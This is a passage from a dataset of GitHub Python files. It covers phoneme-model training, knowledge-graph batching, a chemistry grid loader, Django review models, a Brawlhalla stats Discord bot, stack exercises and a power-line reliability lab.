roc, show_transcription = True, decoder = int_to_phoneme, phrase_count = 5)\n\n\tprint('######################################################################', '\\nValidation Loss:', validation_loss * loss_multiplier)\n\tprint('TN:', tn, '| FP:', fp, '| FN:', fn, '| TP:', tp, '| Accuracy:', (tn + fn) / (tn + fp + fn + tp))\n\ndef investigate_data(model_parameters, path):\n\t\"\"\"\n\tReturns number of phonemes correctly and incorrectly transcribed in dataset, by phoneme\n\n\t:param model_parameters: dictionary with model parameters:\n\t\tUses data directory, phoneme file, batch size\n\t:param path: file where phoneme data saved\n\t\"\"\"\n\tfrom collections import Counter\n\n\tDATA_DIR = model_parameters['data_dir']\n\tPHONEME_OUT = model_parameters['phoneme_out']\n\tbatch_size = model_parameters['batch_size']\n\n\ttrain_data = DataLoader(DATA_DIR, PHONEME_OUT, 'hypothesis', 'binary', 'train', batch_size = batch_size)\n\t#int_to_phoneme = dict((v,k) for k,v in train_data.phoneme_to_int.items())\n\n\tcnt_correct = Counter()\n\tcnt_incorrect = Counter()\n\n\tfor x, y in train_data:\n\t\tx = [phoneme for phrase in x for phoneme in phrase]\n\t\ty = [label for phrase in y for label in phrase]\n\t\tfor i in range(len(x)):\n\t\t\tif y[i]:\n\t\t\t\tcnt_incorrect[int_to_phoneme[x[i]]] += 1\n\t\t\telse:\n\t\t\t\tcnt_correct[int_to_phoneme[x[i]]] += 1\n\t\n\twith open(path, 'w') as f:\n\t\tf.write('PHONEME,CORRECT,INCORRECT')\n\t\tfor key, value in cnt_correct.items():\n\t\t\tf.write('\\n' + str(key) + ',' + str(value) + ',' + str(cnt_incorrect[key]))\n\ntorch.manual_seed = 1\nmodel_parameters = {\n\t'forward_context':\t4,\n\t'backward_context':\t4,\n\t'embed_dim':\t\t15,\n\t'num_epochs':\t\t100,\n\t'batch_size':\t\t32,\n\t'error_weight':\t\t10,\n\t'weights_path':\t\t'../models/',\n\t'data_dir':\t\t\t'../data/transcripts/',\n\t'phoneme_out':\t\t'../data/phonemes.txt',\n\t'roc_location':\t\t'../roc.csv',\n\t'print_batch':\t\t100,\n\t'loss_multiplier':\t10**3,\n\t'save_epoch':\t\t1\n}\n\n\ntrain(model_parameters)\ninvestigate_model(model_parameters, file = 'epoch_7_1135.176.weights')\n#investigate_data(model_parameters, '../diagrams/phoneme_frequency.csv')","repo_name":"francois-rd/phonemic-confusion","sub_path":"src/ff.py","file_name":"ff.py","file_ext":"py","file_size_in_byte":15925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71597676627","text":"# coding:utf-8\nimport numpy as np\nimport tensorflow as tf\nimport json\nfrom tqdm import tqdm\nimport random\nimport timeit\nimport os\nimport itertools\n\n\nclass Batch(object):\n\n def get_batch(self):\n n_triple = len(self.triple_train)\n rand_idx = np.random.permutation(n_triple)\n start = 0\n batchsize = int(n_triple / self.nbatches)\n while start < batchsize * self.nbatches:\n start_t = timeit.default_timer()\n end = min(start + batchsize, n_triple)\n size = end - start\n train_triple_positive = list([self.triple_train[x] for x in rand_idx[start:end]])\n train_triple_negative = []\n for t in train_triple_positive:\n random_num = np.random.random()\n source_entity_id_list = list(range(self.sourceentitytotal))\n target_entity_id_list = list(range(self.targetentitytotal))\n source_entity_id_list.remove(t[0])\n target_entity_id_list.remove(t[1])\n if str(t[0]) in self.source_constrain_dict['dij'].keys():\n dis_samp_source = self.source_constrain_dict['dij'][str(t[0])]\n else: dis_samp_source = []\n if str(t[1]) in self.target_constrain_dict['dij'].keys():\n dis_samp_target = self.target_constrain_dict['dij'][str(t[1])]\n else: dis_samp_target = []\n if self.negative_ent <= len(dis_samp_source):\n replace_source_entity_id_list = random.sample(dis_samp_source, self.negative_ent)\n else:\n try:\n for ntri in self.source_constrain_dict['sbc'][str(t[0])] + dis_samp_source:\n if ntri in source_entity_id_list: \n source_entity_id_list.remove(ntri)\n else:\n pass\n except KeyError:\n pass\n tem = random.sample(source_entity_id_list, self.negative_ent - len(dis_samp_source))\n replace_source_entity_id_list = dis_samp_source + tem\n if self.negative_ent <= len(dis_samp_target):\n replace_target_entity_id_list = random.sample(dis_samp_target, self.negative_ent)\n else:\n try:\n for targettri in self.target_constrain_dict['sbc'][str(t[1])] + dis_samp_target:\n if targettri in target_entity_id_list: \n target_entity_id_list.remove(targettri)\n else:\n pass\n except KeyError:\n pass\n tem = random.sample(target_entity_id_list, self.negative_ent - len(dis_samp_target))\n replace_target_entity_id_list = dis_samp_target + tem\n if self.negative_sampling == 'unif':\n replace_source_probability = 0.5\n else:\n pass\n if self.modelname == \"trans\":\n for mt in replace_target_entity_id_list:\n train_triple_negative.append((t[0], mt))\n else:\n pass\n self.p_positive_batch_n = list([x[0] for x in train_triple_positive])\n self.p_positive_batch_m = list([x[1] for x in train_triple_positive])\n self.p_negative_batch_n = list([triple[0] for triple in train_triple_negative])\n self.p_negative_batch_m = list([triple[1] for triple in train_triple_negative])\n self.p_batch_n = self.p_positive_batch_n + self.p_negative_batch_n\n self.p_batch_m = self.p_positive_batch_m + self.p_negative_batch_m\n start = end\n prepare_t = timeit.default_timer() - start_t\n if self.modelname == \"trans\":\n yield self.p_batch_n, self.p_batch_m, prepare_t\n else:\n pass\n\n def __init__(self):\n self.negative_sampling = 'unif'\n self.triple_train = []\n self.sourceentitytotal = 0\n self.targetentitytotal = 0\n self.sourcerelationtotal = 0\n self.targetrelationtotal = 0\n self.sourceent2id = {}\n self.targetent2id = {}\n self.tripletotal = 0\n self.constrain_source_tripletotal = 0\n self.constrain_target_tripletotal = 0\n self.in_path = \"\"\n self.nbatches = 0\n self.negative_ent = 1\n self.modelname = None\n\n def readData(self):\n\n with open(os.path.join(self.in_path, 'ent_ids_source.txt')) as f:\n self.sourceent2id = {line.strip().split('\\t')[1]: int(line.strip().split('\\t')[0]) for line in f.readlines()}\n with open(os.path.join(self.in_path, 'ent_ids_target.txt')) as f:\n self.targetent2id = {line.strip().split('\\t')[1]: int(line.strip().split('\\t')[0]) for line in f.readlines()}\n with open(os.path.join(self.in_path, 'neg_constrain_source.json')) as f:\n self.source_constrain_dict = json.load(f)\n with open(os.path.join(self.in_path, 'neg_constrain_target.json')) as f:\n self.target_constrain_dict = json.load(f)\n self.triple_train = self.readTriple('train.txt')\n self.sourceentitytotal = len(self.sourceent2id)\n self.targetentitytotal = len(self.targetent2id)\n self.sourcerelationtotal = len(self.sourceent2id)\n self.targetrelationtotal = len(self.targetent2id)\n self.tripletotal = len(self.triple_train)\n \n\n def readTriple(self, filename):\n triple_list = []\n train_list = []\n with open(os.path.join(self.in_path, filename)) as f:\n for line in f.readlines():\n train_list = line.strip().split('\\t')\n triple_list.append((int(train_list[0]), int(train_list[1])))\n\n return triple_list\n\n def setBatches(self, nbatches):\n self.nbatches = nbatches\n\n def inPath(self, path):\n self.in_path = path\n\n def negRate(self, rate):\n self.negative_ent = rate\n\n def negativeSampling(self, negative_sampling):\n self.negative_sampling = negative_sampling\n\n def model_name(self, name):\n self.modelname = name\n\nclass Config(Batch):\n\n def __init__(self):\n Batch.__init__(self)\n self.out_path = None\n self.train_times = 0\n self.alpha = 0.001\n self.log_on = 1\n self.dimension = 100\n self.exportName = None\n self.importName = None\n self.export_steps = 0\n self.opt_method = \"SGD\"\n self.optimizer = None\n\n\n def init(self):\n if self.in_path != None:\n self.readData()\n self.sourceenttotal = self.sourceentitytotal\n self.targetenttotal = self.targetentitytotal\n self.sourcereltotal = self.sourcerelationtotal\n self.targetreltotal = self.targetrelationtotal\n self.batchsize = int(self.tripletotal / self.nbatches)\n self.batch_seq_size = self.batchsize * (1 + self.negative_ent)\n self.batch_n = np.zeros(self.batchsize * (1 + self.negative_ent), dtype=np.int64)\n self.batch_m = np.zeros(self.batchsize * (1 + self.negative_ent), dtype=np.int64)\n\n def optimizer(self, optimizer):\n self.optimizer = optimizer\n\n def optMethod(self, method):\n self.opt_method = method\n\n def learningRate(self, alpha):\n self.alpha = alpha\n\n def vecFiles(self, path):\n self.out_path = path\n\n def entDimension(self, dim):\n self.dimension = dim\n\n def trainTimes(self, times):\n self.train_times = times\n\n def exportFiles(self, path, steps=0):\n self.exportName = path\n self.export_steps = steps\n\n def saveTF(self):\n with self.graph.as_default():\n with self.sess.as_default():\n self.saver.save(self.sess, self.exportName)\n\n def parameters_name(self, var_name):\n with self.graph.as_default():\n with self.sess.as_default():\n if var_name in self.trainModel.parameter_lists:\n return self.sess.run(self.trainModel.parameter_lists[var_name])\n else:\n return None\n\n def get_parameters(self, mode=\"numpy\"):\n res = {}\n lists = self.trainModel.parameter_lists\n for var_name in lists:\n if mode == \"numpy\":\n res[var_name] = self.parameters_name(var_name)\n else:\n res[var_name] = self.parameters_name(var_name).tolist()\n return res\n\n def save_parameters(self, path=None):\n if path == None:\n path = self.out_path\n f = open(path, \"w\")\n f.write(json.dumps(self.get_parameters(\"list\")))\n f.close()\n\n def model(self, model):\n self.model = model\n self.graph = tf.Graph()\n with self.graph.as_default():\n self.sess = tf.Session()\n with self.sess.as_default():\n initializer = tf.contrib.layers.xavier_initializer(uniform=True)\n with tf.variable_scope(\"model\", reuse=None, initializer=initializer):\n self.trainModel = self.model(config=self)\n self.optimizer = tf.train.GradientDescentOptimizer(self.alpha)\n grads_and_vars = self.optimizer.compute_gradients(self.trainModel.pro_loss)\n self.train_op = self.optimizer.apply_gradients(grads_and_vars)\n self.saver = tf.train.Saver()\n self.sess.run(tf.initialize_all_variables())\n\n def train(self, batch_h, batch_t):\n feed_dict = {\n self.trainModel.batch_n: batch_h,\n self.trainModel.batch_m: batch_t}\n _,pro_loss = self.sess.run([self.train_op, self.trainModel.pro_loss], feed_dict)\n return pro_loss\n\n def run(self):\n with self.graph.as_default():\n with self.sess.as_default():\n for times in tqdm(range(self.train_times)):\n pro_res = 0.0\n if self.modelname == 'trans':\n for bn, bm, _ in self.get_batch():\n pro = self.train(bn, bm)\n pro_res += pro\n else:\n pass\n #self.saveTF()\n self.save_parameters(self.out_path)\n","repo_name":"ellenzhuwang/AgreementMakerDeep","sub_path":"conf/oaei-resources/Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":10489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"38303946745","text":"import numpy as np\nimport sys\nfrom read_one import read_ggchem_file\n\ndef load(dir, species_info_file): \n metallicities = np.arange(-1, 3.0+0.1, 0.1)\n COs = np.array([0.05, 0.1, 0.2, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 0.95, 1.0, 1.05, 1.1, 1.2, 1.4, 1.6, 1.8, 2.0])\n all_data = []\n \n for m_index, m in enumerate(metallicities):\n data_for_Z = []\n for co_index, co in enumerate(COs):\n if m < 1e-4 and m > -1e-4: m = 0\n if co == 0.95:\n co_string = \"0.95\"\n elif co == 1.05:\n co_string = \"1.05\"\n else:\n co_string = \"{:.1f}\".format(co)\n filename = \"{}/result_{:.1f}_{}/Static_Conc_2D.dat\".format(dir, m, co_string)\n print(filename, m)\n\n abund_dict, abund_arr = read_ggchem_file(filename, species_info_file)\n data_for_Z.append(abund_arr)\n #all_data.append(abund_arr)\n all_data.append(data_for_Z)\n \n all_data = np.array(all_data)\n\n #Want shape to be: (N_P, N_T, N_species, N_CO, N_metallicites)\n all_data = all_data.transpose([0, 1, 2, 4, 3])\n np.save(\"all_data.npy\", all_data)\n\n\nload(sys.argv[1], sys.argv[2])\n","repo_name":"ideasrule/platon","sub_path":"misc/load_grid.py","file_name":"load_grid.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"39108493464","text":"from django.conf import settings\nfrom django.db import models\nfrom django.dispatch import receiver\nimport os\n\n\nclass Ticket(models.Model):\n title = models.CharField('Titre', max_length=128)\n description = models.TextField(max_length=2048, blank=True)\n user = models.ForeignKey(to=settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='tickets')\n image = models.ImageField(null=True, blank=True, upload_to='images/')\n time_created = models.DateTimeField(auto_now_add=True)\n\n\nclass Review(models.Model):\n class Ratings(models.IntegerChoices):\n TRASH = 0\n VERY_BAD = 1\n BAD = 2\n MEEEE = 3\n GOOD = 4\n PERFECT = 5\n\n # ticket.reviews will give us list of review which ticket corresponds to the current ticket.\n ticket = models.ForeignKey(to=Ticket, on_delete=models.CASCADE, related_name='reviews')\n rating = models.IntegerField(choices=Ratings.choices)\n user = models.ForeignKey(\n to=settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE,\n related_name='reviews',\n )\n headline = models.CharField('Titre', max_length=128)\n body = models.TextField('Commentaire', max_length=8192, blank=True)\n time_created = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n unique_together = ('ticket', 'user', ) # a user can't make 2 reviews of the same ticket\n\n\nclass UserFollows(models.Model):\n user = models.ForeignKey(to=settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='is_following')\n followed_user = models.ForeignKey(\n to=settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE,\n related_name='is_followed_by',\n )\n\n class Meta:\n # ensures we don't get multiple UserFollows instances\n # for unique user-user_followed pairs\n unique_together = ('user', 'followed_user', )\n constraints = [\n models.CheckConstraint(\n name=\"cant_follow_self\",\n check=~models.Q(user=models.F(\"followed_user\")),\n ),\n ]\n\n\n@receiver(models.signals.post_delete, sender=Ticket)\ndef delete_image_on_ticket_delete(sender, instance, **kwargs):\n \"\"\"\n Delete image when ticket is deleted.\n \"\"\"\n if instance.image:\n if os.path.isfile(instance.image.path):\n os.remove(instance.image.path)\n\n\n@receiver(models.signals.pre_save, sender=Ticket)\ndef update_image_on_ticket_update(sender, instance, **kwargs):\n \"\"\"\n Deletes old image from filesystem\n when corresponding `Ticket` object is updated\n with new image.\n \"\"\"\n if not instance.pk:\n return False\n\n try:\n old_image = sender.objects.get(pk=instance.pk).image\n if not old_image:\n # Rare case when image doesn't exist but no exception raised.\n return False\n except sender.DoesNotExist:\n return False\n\n new_image = instance.image\n if not old_image == new_image:\n if os.path.isfile(old_image.path):\n os.remove(old_image.path)\n","repo_name":"Riazzor/LitReview","sub_path":"reviewer/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73203152145","text":"import discord\nimport requests\n\nkey = \"key\"\n\ndef get_player(message):\n split_msg = message.content.split(\" \", 1)\n name = split_msg[1].replace(\" \", \"%20\")\n \n try:\n id_data = requests.get(\"https://api.brawlhalla.com/search?steamid=\" + name + \"&api_key=\" + key)\n id = id_data.json()[\"brawlhalla_id\"]\n except: return discord.Embed(title=\"Can not find player\")\n\n data = requests.get(\"https://api.brawlhalla.com/player/\" + str(id) + \"/stats?api_key=\" + key)\n ranked_data = requests.get(\"https://api.brawlhalla.com/player/\" + str(id) + \"/ranked?api_key=\" + key)\n\n data = data.json()\n ranked_data = ranked_data.json()\n\n user_name = data[\"name\"]\n level = data[\"level\"]\n games = data[\"games\"]\n wins = data[\"wins\"]\n\n embed = discord.Embed(title=f\"Brawlhalla {user_name}\",\n color=message.guild.me.top_role.color,\n timestamp=message.created_at, )\n embed.add_field(name=\"Level\", value=f\"{level}\")\n embed.add_field(name=\"Games\", value=f\"{games}\")\n embed.add_field(name=\"Wins\", value=f\"{wins}\")\n\n try:\n rank = ranked_data[\"tier\"]\n ranked_games = ranked_data[\"games\"]\n ranked_wins = ranked_data[\"wins\"]\n embed.add_field(name=\"Rank\", value=f\"{rank}\")\n embed.add_field(name=\"Ranked games\", value=f\"{ranked_games}\")\n embed.add_field(name=\"Ranked wins\", value=f\"{ranked_wins}\")\n except:\n embed.add_field(name=\"Ranked games\", value=f\"Never played ranked\")\n\n embed.set_footer(text=f\"Requested by {message.author.name}\")\n\n return embed","repo_name":"kasparpollet/py_bot","sub_path":"venv/brawlhalla.py","file_name":"brawlhalla.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36581356890","text":"# Создаем пустой список для хранения чисел\nnumber_list = []\n\nwhile True:\n print(\"Меню:\")\n print(\"1. Добавить число в список\")\n print(\"2. Удалить все вхождения числа из списка\")\n print(\"3. Показать содержимое списка (с начала или с конца)\")\n print(\"4. Проверить есть ли значение в списке\")\n print(\"5. Заменить значение в списке\")\n print(\"6. Выйти\")\n\n choice = input(\"Выберите действие (1/2/3/4/5/6): \")\n\n if choice == \"1\":\n num = int(input(\"Введите число для добавления: \"))\n if num not in number_list:\n number_list.append(num)\n else:\n print(f\"Число {num} уже существует в списке.\")\n\n elif choice == \"2\":\n num = int(input(\"Введите число для удаления: \"))\n number_list = [x for x in number_list if x != num]\n\n elif choice == \"3\":\n direction = input(\"Показать с начала или с конца? (начало/конец): \")\n if direction == \"начало\":\n print(number_list)\n elif direction == \"конец\":\n print(number_list[::-1])\n\n elif choice == \"4\":\n num = int(input(\"Введите число для проверки: \"))\n if num in number_list:\n print(f\"Число {num} есть в списке.\")\n else:\n print(f\"Числа {num} нет в списке.\")\n\n elif choice == \"5\":\n num = int(input(\"Введите число для замены: \"))\n new_num = int(input(\"Введите новое число: \"))\n replace_all = input(\"Заменить все вхождения? (да/нет): \")\n if replace_all == \"да\":\n number_list = [new_num if x == num else x for x in number_list]\n else:\n for i in range(len(number_list)):\n if number_list[i] == num:\n number_list[i] = new_num\n\n elif choice == \"6\":\n break\n#_________________________________________________________________________________________________\nclass DynamicStack:\n def __init__(self):\n self.stack = []\n\n def push(self, value):\n self.stack.append(value)\n\n def pop(self):\n if not self.is_empty():\n return self.stack.pop()\n else:\n print(\"Стек пуст. Невозможно извлечь элемент.\")\n return None\n\n def count(self):\n return len(self.stack)\n\n def is_empty(self):\n return len(self.stack) == 0\n\n def clear(self):\n self.stack = []\n\n def peek(self):\n if not self.is_empty():\n return self.stack[-1]\n else:\n print(\"Стек пуст. Невозможно получить элемент.\")\n return None\n\n# Пример использования\nstack = DynamicStack()\n\nwhile True:\n print(\"Меню:\")\n print(\"1. Добавить строку в стек\")\n print(\"2. Вытолкнуть строку из стека\")\n print(\"3. Количество строк в стеке\")\n print(\"4. Проверить пустой ли стек\")\n print(\"5. Очистить стек\")\n print(\"6. Получить значение без выталкивания\")\n print(\"7. Выйти\")\n\n choice = input(\"Выберите действие (1/2/3/4/5/6/7): \")\n\n if choice == \"1\":\n value = input(\"Введите строку для добавления в стек: \")\n stack.push(value)\n\n elif choice == \"2\":\n popped_value = stack.pop()\n if popped_value is not None:\n print(f\"Извлечено: {popped_value}\")\n\n elif choice == \"3\":\n print(f\"Количество строк в стеке: {stack.count()}\")\n\n elif choice == \"4\":\n if stack.is_empty():\n print(\"Стек пуст.\")\n else:\n print(\"Стек не пуст.\")\n\n elif choice == \"5\":\n stack.clear()\n print(\"Стек очищен.\")\n\n elif choice == \"6\":\n peeked_value = stack.peek()\n if peeked_value is not None:\n print(f\"Верхняя строка в стеке: {peeked_value}\")\n\n elif choice == \"7\":\n break\n\n \n\n\n\n#_________________________________________________________________________________________________\n\nclass FixedSizeStack:\n def __init__(self, max_size):\n self.stack = []\n self.max_size = max_size\n\n def push(self, value):\n if len(self.stack) < self.max_size:\n self.stack.append(value)\n else:\n print(\"Стек полный. Невозможно добавить элемент.\")\n\n def pop(self):\n if not self.is_empty():\n return self.stack.pop()\n else:\n print(\"Стек пуст. Невозможно извлечь элемент.\")\n return None\n\n def count(self):\n return len(self.stack)\n\n def is_empty(self):\n return len(self.stack) == 0\n\n def is_full(self):\n return len(self.stack) == self.max_size\n\n def clear(self):\n self.stack = []\n\n def peek(self):\n if not self.is_empty():\n return self.stack[-1]\n else:\n print(\"Стек пуст. Невозможно получить элемент.\")\n return None\n\n# Пример использования\nstack = FixedSizeStack(5)\n\nwhile True:\n print(\"Меню:\")\n print(\"1. Добавить строку в стек\")\n print(\"2. Вытолкнуть строку из стека\")\n print(\"3. Количество строк в стеке\")\n print(\"4. Проверить пустой ли стек\")\n print(\"5. Проверить полный ли стек\")\n print(\"6. Очистить стек\")\n print(\"7. Получить значение без выталкивания\")\n print(\"8. Выйти\")\n\n choice = input(\"Выберите действие (1/2/3/4/5/6/7/8): \")\n\n if choice == \"1\":\n value = input(\"Введите строку для добавления в стек: \")\n stack.push(value)\n\n elif choice == \"2\":\n popped_value = stack.pop()\n if popped_value is not None:\n print(f\"Извлечено: {popped_value}\")\n\n elif choice == \"3\":\n print(f\"Количество строк в стеке: {stack.count()}\")\n\n elif choice == \"4\":\n if stack.is_empty():\n print(\"Стек пуст.\")\n else:\n print(\"Стек не пуст.\")\n\n elif choice == \"5\":\n if stack.is_full():\n print(\"Стек полный.\")\n else:\n print(\"Стек не полный.\")\n\n elif choice == \"6\":\n stack.clear()\n print(\"Стек очищен.\")\n\n elif choice == \"7\":\n peeked_value = stack.peek()\n if peeked_value is not None:\n print(f\"Верхняя строка в стеке: {peeked_value}\")\n\n elif choice == \"8\":\n break","repo_name":"Asirush/python","sub_path":"hw/hw_22/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7233,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36580364365","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom scipy.optimize import curve_fit\nfrom scipy.stats.distributions import chi2\nimport numpy as np\n\ndef calculate_mean(nfails, km, nyears):\n return nfails / (km * nyears)\ndef assignment_1(name, nfails, km, nyears):\n # 1.1\n # repair time for EHV and HV is 44 hours on average (From table 2.3)\n\n f = calculate_mean(nfails, km, nyears) # failure rate\n print(\"Failure frequency for {} = {}\".format(name, f))\n\n # Mean Time To Failure (MTTF)\n mttf = (nyears * 8760) / nfails\n print(\"Mean Time To Failure (MTTF) for {} = {}\".format(name, mttf))\n\n # Mean Time To Repair (MTTR)\n mttr = 44\n print(\"Mean Time To Repair (MTTR) for {} = {}\".format(name, mttr))\n\n # Mean Time Between Failures (MTBF)\n mtbf = mttf + mttr\n print(\"Mean Time Between Failures for {} = {}\\n\".format(name, mtbf))\n\n return f\n\n\ndef assignment_2(name, nfails, km, nyears, mean):\n # 1.2\n\n # l = average failure rate [/cctkm·yr] or [/comp·yr]\n # T = total considered time length (component-years) [cctkm·yr] or [comp·yr]\n # F = statistical number of failures within T [-]\n # alpha = significance level [-]\n # χ2 = Chi-square distribution.\n # 1-α/2 or α/2 = probability\n # 2F or 2F+2 = degrees of freedom\n\n T = nyears * km # years\n alpha = 0.05 # 95% confidence interval\n F = nfails # number of failures\n\n confidence_interval_right = chi2.ppf(1 - alpha / 2, 2 * F) / (2 * T)\n confidence_interval_left = chi2.ppf(alpha / 2, 2 * F + 2) / (2 * T)\n\n print(\"{}% Confidence interval for {} = [{}, {}]\"\n .format((1 - alpha) * 100, name, confidence_interval_left, confidence_interval_right))\n\n # figure related code\n fig = plt.figure()\n fig.suptitle('Assignment 2', fontsize=14, fontweight='bold')\n if name.find(\"5\") == -1:\n fig.suptitle('Assignment 3', fontsize=14, fontweight='bold')\n\n ax = fig.add_subplot(111)\n ax.boxplot([confidence_interval_left, mean, confidence_interval_right])\n\n ax.set_title('Failure frequency for {}'.format(name))\n\n quantiles = np.quantile([confidence_interval_left, mean, confidence_interval_right], np.array([0.00, 0.25, 0.50, 0.75, 1.00]))\n ax.hlines(quantiles, [0] * quantiles.size, [1] * quantiles.size,\n color='b', ls=':', lw=0.5, zorder=0)\n ax.set_xlim(0.5, 1.5)\n ax.set_yticks(quantiles)\n\n if name.find(\"5\") == -1:\n fig.savefig('Assignment 3 - Failure frequency for {}.png'.format(name))\n else:\n fig.savefig('Assignment 2 - Failure frequency for {}.png'.format(name))\n #plt.show()\n\ndef assignment_3():\n # 3 years later\n # 42 EHV OHL faliures\n # 167 HV OHL faliures\n # 2471 km of EHV OHL\n # 4078 km of HV OHL\n\n # Calculate the failure frequencies of EHV, HV, and EHV/HV OHLs again, together with their\n # 95% confidence intervals. Also plot the results as a boxplot\n print(\"\\n\\nAssignment 3:\\n\")\n\n mean_EHV_3 = assignment_1('EHV-8years', 42, 2471, 8)\n mean_HV_3 = assignment_1('HV-8years', 167, 4078, 8)\n\n assignment_2('EHV-8years', 42, 2471, 3, mean_EHV_3)\n assignment_2('HV-8years', 167, 4078, 3, mean_HV_3)\n assignment_2('EHV-HV-8years', 42 + 167, 2471 + 4078, 3, mean_EHV_3 + mean_HV_3)\ndef assignment_4():\n print(\"\\n\\nAssignment 4:\\n\")\n df = pd.read_csv(\"repair_times_OHL.csv\")\n data = df[\"Repair Times\"].values.tolist()\n data.sort()\n print(\"Repair times: \", data)\n print(\"Average repair time = {}\".format(sum(data) / len(data)))\n print(\"Minimum repair time = {}\".format(min(data)))\n print(\"Maximum repair time = {}\".format(max(data)))\n\ndef assignment_5():\n print(\"\\n\\nAssignment 5:\\n\");\n df = pd.read_csv(\"repair_times_OHL.csv\")\n data = df[\"Repair Times\"].values.tolist()\n\n # figure related code\n fig = plt.figure()\n fig.suptitle('Assignment 5', fontsize=14, fontweight='bold')\n\n ax = fig.add_subplot(111)\n ax.boxplot(data)\n\n ax.set_title('Repair times for OHL')\n\n quantiles = np.quantile(data, np.array([0.00, 0.25, 0.50, 0.75, 1.00]))\n ax.hlines(quantiles, [0] * quantiles.size, [1] * quantiles.size,\n color='b', ls=':', lw=0.5, zorder=0)\n ax.set_xlim(0.5, 1.5)\n ax.set_yticks(quantiles)\n # ax.set_yticklabels(quantiles, rotation=30, fontsize=8)\n\n fig.savefig('Assignment 5 - Repair times.png')\n #plt.show()\n\n\ndef assignment_6():\n print(\"\\n\\nAssignment 6:\\n\")\n # F(t) = fraction of unrepaired components (1=no repaired components, 0=all components repaired) [-]\n # t = time [h]\n # T1 (-b) = repair time (according to the exponential distribution) [h]\n # a = coefficient of the exponential term\n # c = independent term\n df = pd.read_csv(\"repair_times_OHL.csv\")\n data = df[\"Repair Times\"].values.tolist()\n data.sort()\n Ft = np.arange(0, 1.00001, 1/(len(data) - 1))\n Ft = np.arange(1.0/(len(data)+1), 1.00001-1.0/(len(data)+1), 1/(len(data) + 1))\n x_axis = np.arange(0, 70 + 0.00001, 0.1)\n params, covariance = curve_fit(exponential, data, Ft)\n # figure related code\n fig = plt.figure()\n fig.suptitle('Assignment 6', fontsize=14, fontweight='bold')\n\n ax = fig.add_subplot(111)\n ax.scatter(data, Ft)\n ax.plot(x_axis, exponential(x_axis, *params), '--')\n\n ax.set_title('Fitted exponential curve')\n\n fig.savefig('Assignment 6 - Fitted exponential curve.png')\n # plt.show()\n print(params)\n\n\ndef exponential_old(t, a, b, c):\n return a * np.exp(-b * np.asarray(t)) + c\n\n\ndef exponential(b, t):\n return -np.exp(-b * np.asarray(t)) + 1\n\n\nif __name__ == '__main__':\n print(\"Assignment 1:\\n\")\n mean_EHV = assignment_1('EHV', 25, 2310, 5)\n mean_HV = assignment_1('HV', 51, 3329, 5)\n mean_EHV_HV = assignment_1('EHV+HV', 76, 5639, 5)\n if mean_EHV > mean_HV:\n print(\"EHV has a higher failure frequency than HV\\n\\n\")\n else:\n print(\"HV has a higher failure frequency than EHV\\n\\n\")\n\n print(\"Assignment 2:\\n\")\n assignment_2('EHV-5years', 25, 2310, 5, mean_EHV)\n assignment_2('HV-5years', 51, 3329, 5, mean_HV)\n assignment_2('EHV-HV-5years', 25 + 51, 2310 + 3329, 5,mean_EHV_HV)\n\n assignment_3()\n assignment_4()\n assignment_5()\n assignment_6()\n\n\n","repo_name":"dansavastre/Reliability-of-Sustainable-Power-Systems","sub_path":"Lab1.py","file_name":"Lab1.py","file_ext":"py","file_size_in_byte":6209,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"5086177776","text":"from typing import List, Optional, Tuple\n\nimport numpy as np\n\nfrom ..detection.detection_types import Detection\nfrom ..utils.rectangle import Rectangle\nfrom ..utils.timing import get_current_time_millis\n\n\ndef split_image_into_squares(image: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:\n height, width, _ = image.shape\n return (image[:, :height, :], image[:, width - height :, :])\n\n\ndef get_split_image_dimensions(\n image: np.ndarray,\n) -> List[Rectangle]:\n height, width, _ = image.shape\n return [\n Rectangle(0, 0, height, height),\n Rectangle(width - height, 0, width, height),\n ]\n\n\nclass CameraImageContainer:\n def __init__(\n self,\n camera_name: str,\n raw_image_np: np.ndarray,\n dimensions: List[Rectangle],\n cropped_images: List[np.ndarray],\n detailed: bool,\n created_at: int,\n ):\n self.camera_name = camera_name\n self.raw_image_np = raw_image_np\n self.dimensions = dimensions\n self.cropped_images = cropped_images\n self.detailed = detailed\n self.created_at = created_at\n\n @classmethod\n def create(\n cls,\n camera_name: str,\n raw_image_np: np.ndarray,\n dimensions: List[Rectangle],\n detailed: bool = False,\n created_at: Optional[int] = None,\n ) -> \"CameraImageContainer\":\n if created_at is None:\n created_at = get_current_time_millis()\n\n cropped_images = [\n raw_image_np[\n crop_image_dimensions.y1 : crop_image_dimensions.y2,\n crop_image_dimensions.x1 : crop_image_dimensions.x2,\n :,\n ]\n for crop_image_dimensions in dimensions\n ]\n\n return cls(\n camera_name, raw_image_np, dimensions, cropped_images, detailed, created_at\n )\n\n\nclass DetectionCameraImageContainer:\n camera_image_container: CameraImageContainer\n detections: List[Detection]\n\n def __init__(\n self, camera_image_container: CameraImageContainer, detections: List[Detection]\n ):\n self.camera_image_container = camera_image_container\n self.detections = detections\n\n def has_detections(self):\n return len(self.detections) > 